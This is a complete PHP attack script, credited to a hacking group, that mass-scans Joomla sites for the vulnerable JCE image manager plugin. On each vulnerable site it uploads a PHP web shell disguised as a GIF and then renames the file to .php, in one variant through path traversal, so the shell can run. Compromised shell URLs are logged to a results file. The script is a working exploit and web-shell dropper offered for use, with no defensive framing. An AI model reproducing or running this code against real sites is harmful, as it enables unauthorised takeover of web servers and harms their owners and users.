jce

1. <?php
2.  
3. /*
4.  
5.         JCE Scanner & Exploiter By Security Knights Team
6.  
7.          all rights reserved for s3c-k members
8.  
9.                  Home : http://s3c-k.com/vb/
10. */
11.  
12. if (!isset ($argv[1]))
13.     die (help ());
14.  
15. if (!file_exists ($argv[1]))
16.     die ("\"{$argv[1]}\" Not Found !\n");
17.  
18. $sites = explode ("\n", trim (@file_get_contents ($argv[1])));
19.  
20. echo "\n".count ($sites)." Website Loaded\n\n";
21.  
22. $file = fopen ("jce_scanner_result.txt", "w");
23. fwrite ($file, "        JCE Scanner & Exploiter By Security Knights Team
24.  
25.          all rights reserved for s3c-k members
26.  
27.                  Home : http://s3c-k.com/vb/\n\n");
28.  
29. foreach ($sites as $site)
30. {
31.     echo "[+] Scaning => $site [+]\n";
32.     echo "[?] Vulnerable : ";
33.     if (scan ($site))
34.     {
35.         echo "Yes\n";
36.         echo "[!] Result : ";
37.         if ($result = exploit ($site))
38.         {
39.             echo "Done => $result\n\n";
40.             fwrite ($file, $result."\n");
41.         }
42.         else
43.             echo "Exploit Failed\n\n";
44.     }
45.     else
46.         echo "No\n\n";
47. }
48.  
49. fclose ($file);
50. echo "\n";
51.  
52. function scan ($site)
53. {
54.     $host = parse_url ($site, PHP_URL_HOST);
55.     $packet = "GET /plugins/editors/jce/tiny_mce/plugins/imgmanager/imgmanager.xml HTTP/1.0\r\n";
56.     $packet .= "Host: $host\r\n";
57.     $packet .= "User-Agent: Mozilla\r\n\r\n";
58.  
59.     $imgmanager = send ($host, $packet);
60.     if (preg_match ("/<version>(.*)<\/version>/", $imgmanager, $version))
61.     {
62.         return true;
63.     }
64.     return false;
65. }
66.  
67. function exploit ($site)
68. {
69.     $uploader = '<form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />File To Upload : <input name="userfile" type="file" /><input type="submit" value="Upload"/></form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir . basename ($_FILES[\'userfile\'][\'name\']);if (move_uploaded_file ($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)){echo "File was successfully uploaded.</br>";}else{echo "Upload failed";}?>';
70.  
71.     $dir = "/";
72.  
73.     $host = parse_url ($site, PHP_URL_HOST);
74.     $path = parse_url ($site, PHP_URL_PATH);
75.     if (!$path)
76.         $path = "/";
77.  
78.     $data    = "-----------------------------41184676334\r\n";
79.     $data   .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
80.     $data   .= "$dir\r\n";
81.     $data   .= "-----------------------------41184676334\r\n";
82.     $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
83.     $data   .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
84.     $data   .= "-----------------------------41184676334\r\n";
85.     $data   .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
86.     $data   .= "0\r\n";
87.     $data   .= "-----------------------------41184676334\r\n";
88.     $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"s3c-k.gif\"\r\n";
89.     $data   .= "Content-Type: image/gif\r\n\r\n";
90.     $data   .= "GIF89a\n$uploader\r\n";
91.     $data   .= "-----------------------------41184676334\r\n";
92.     $data   .= "0\r\n";
93.     $data   .= "-----------------------------41184676334\r\n";
94.     $data   .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
95.     $data   .= "upload\r\n";
96.     $data   .= "-----------------------------41184676334--";
97.  
98.     /*:p by s3c-k team */$packet = "POST ".$path."index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload&140329-063531 HTTP/1.0\r\n";
99.     $packet .= "Host: $host\r\n";
100.     $packet .= "User-Agent: Mozilla\r\n";
101.     $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n";
102.     $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
103.     $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
104.     $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
105.     $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
106.     $packet .= "Accept-Encoding: deflate\n";
107.     $packet .= "Connection: Close\r\n";
108.     $packet .= "Proxy-Connection: close\r\n";
109.     $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n";
110.     $packet .= $data;
111.     $packet .= "\r\n";
112.  
113.     send ($host, $packet);
114.  
115.     if (preg_match ("/Upload/", send ($host, "GET /images/stories/s3c-k.gif HTTP/1.0\r\nHost: $host\r\nUser-Agent: Mozilla\r\n\r\n")))
116.     {
117.         json_rename_folder ($site, $dir."s3c-k.gif", "s3c-k.php");
118.         if (preg_match ("/Upload/", send ($host, "GET /images/stories/s3c-k.php HTTP/1.0\r\nHost: $host\r\nUser-Agent: Mozilla\r\n\r\n")))
119.             return "http://$host".$path."images/stories/s3c-k.php";
120.         else
121.         {
122.             json_rename_folder ($site, $dir."s3c-k.gif", "../../s3c-k.php");
123.             if (preg_match ("/Upload/", send ($host, "GET /s3c-k.php HTTP/1.0\r\nHost: $host\r\nUser-Agent: Mozilla\r\n\r\n")))
124.                 return "http://$host".$path."s3c-k.php";
125.         }
126.     }
127.     else
128.     {
129.         if (preg_match ("/Upload/", send ($host, "GET /images/s3c-k.gif HTTP/1.0\r\nHost: $host\r\nUser-Agent: Mozilla\r\n\r\n")))
130.         {
131.             json_rename_folder ($site, $dir."s3c-k.gif", "s3c-k.php");
132.             if (preg_match ("/Upload/", send ($host, "GET /images/s3c-k.php HTTP/1.0\r\nHost: $host\r\nUser-Agent: Mozilla\r\n\r\n")))
133.                 return "http://$host".$path."images/s3c-k.php";
134.         }
135.     }
136. }
137.  
138. function json_rename_folder ($site, $old, $new)
139. {
140.     $host = parse_url ($site, PHP_URL_HOST);
141.     $path = parse_url ($site, PHP_URL_PATH);
142.     if (!$path)
143.         $path = "/";
144.  
145.     $rename = "json={\"fn\":\"folderRename\",\"args\":[\"$old\",\"$new\"]}";
146.  
147.     $packet = "POST ".$path."index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager HTTP/1.0\r\n";
148.     $packet .= "Host: $host\r\n";
149.     $packet .= "User-Agent: Mozilla\r\n";
150.     $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
151.     $packet .= "Accept-Language: en-US,en;q=0.8\r\n";
152.     $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
153.     $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
154.     $packet .= "Accept-Encoding: deflate\n";
155.     $packet .= "X-Request: JSON\r\n";
156.     $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(non​e); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
157.     $packet .= "Content-Length: ".strlen ($rename)."\r\n\r\n";
158.     $packet .= $rename."\r\n\r\n";
159.  
160.     send ($host, $packet);
161. }
162.  
163. function send ($host, $data)
164. {
165.     if ($connection = @fsockopen ($host, 80, $x, $y, 3))
166.     {
167.         $response = "";
168.         fputs ($connection, $data);
169.         while (!feof ($connection))
170.             $response .= fgets ($connection);
171.         fclose ($connection);
172.         return $response;
173.     }
174. }
175.  
176. function help ()
177. {
178.     global $argv;
179.     echo "\n\n\t\t\t     ,-*'^'~*-.,_,.-*~ Security Knights Team ~*-.,_,.-*~'^'*-,\n\n";
180.     echo "\t\t\t\t\t   Home : http://s3c-k.com/vb/\n\n";
181.     echo "\t\t\t\t▁ â–‚ â–„ â–… â–† â–‡ â–ˆ JCE Scanner & Exploiter â–ˆ â–‡ â–† â–… â–„ â–‚ ▁";
182.     echo "\n\n\t\t\t\t\tUsage : php {$argv[0]} sites.txt\n\n";
183. }
184.  
185. ?>